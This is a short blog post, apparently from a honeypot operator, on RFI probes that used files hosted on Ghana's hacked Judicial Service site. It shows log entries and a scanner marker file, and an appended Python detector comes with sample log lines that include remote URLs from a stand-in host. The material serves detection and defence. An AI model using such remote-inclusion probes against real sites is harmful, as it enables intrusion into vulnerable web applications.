Ghana Judicial Service site hacked

Yesterday we started to see RFI attacks against our honeypots using files hosted from (Ghana’s official Judicial Service site).

These are some of the entries we are seeing:

a.18.218.14 - - [05/Apr/2010:11:22:26 -0700]
"GET //good.php? HTTP/1.1" 404 206 "-" "Mozilla/5.0"

b.72.56.2 - - [05/Apr/2010:12:55:38 -0700]
"GET //good.php? HTTP/1.1" 404 206 "-" "Mozilla/5.0"

Looking at the specified file, we see again the famous entry for the FeeLCoMz RFI Scanner Bot:

$ lynx --source --dump

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

And I bet money that they got hacked for using an old version of Joomla (or a vulnerable plugin).
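
One way to flag probes like the entries above in an Apache access log, and to recognise a marker file like the one shown; this is an added example, not code from the original post. The sample log lines, the parameter names (`page`, `inc`), the host `files.example.org` and the source addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)
# Marker file shown on the page: echo of a split string followed by die().
MARKER_RE = re.compile(r'echo\s*\(\s*"\w+"\s*\.\s*"\w+"\s*\)\s*;\s*die\s*\(')


def rfi_probe(line):
    """Return details if any query parameter value is a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _, _, query = m.group("target").partition("?")
    # parse_qsl percent-decodes values, so encoded URLs are caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(value.strip()):
            return {
                "src": m.group("src"),
                "param": name,
                "remote": value,
                # 2xx means the application answered the probe: review that script.
                "review": m.group("status").startswith("2"),
            }
    return None


def is_scanner_marker(body):
    """True if a fetched include file matches the echo/die marker pattern."""
    return bool(MARKER_RE.search(body))


# Constructed sample lines (documentation addresses, hypothetical paths and host).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Apr/2010:11:22:26 -0700] "GET /index.php?page=http://files.example.org//good.php? HTTP/1.1" 404 206 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [05/Apr/2010:12:55:38 -0700] "GET /view.php?inc=http%3A%2F%2Ffiles.example.org%2Fgood.php%3F HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [05/Apr/2010:13:01:02 -0700] "GET /search.php?q=joomla HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]
SAMPLE_MARKER = '<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>'

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(rfi_probe(entry))
    print(is_scanner_marker(SAMPLE_MARKER))
```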
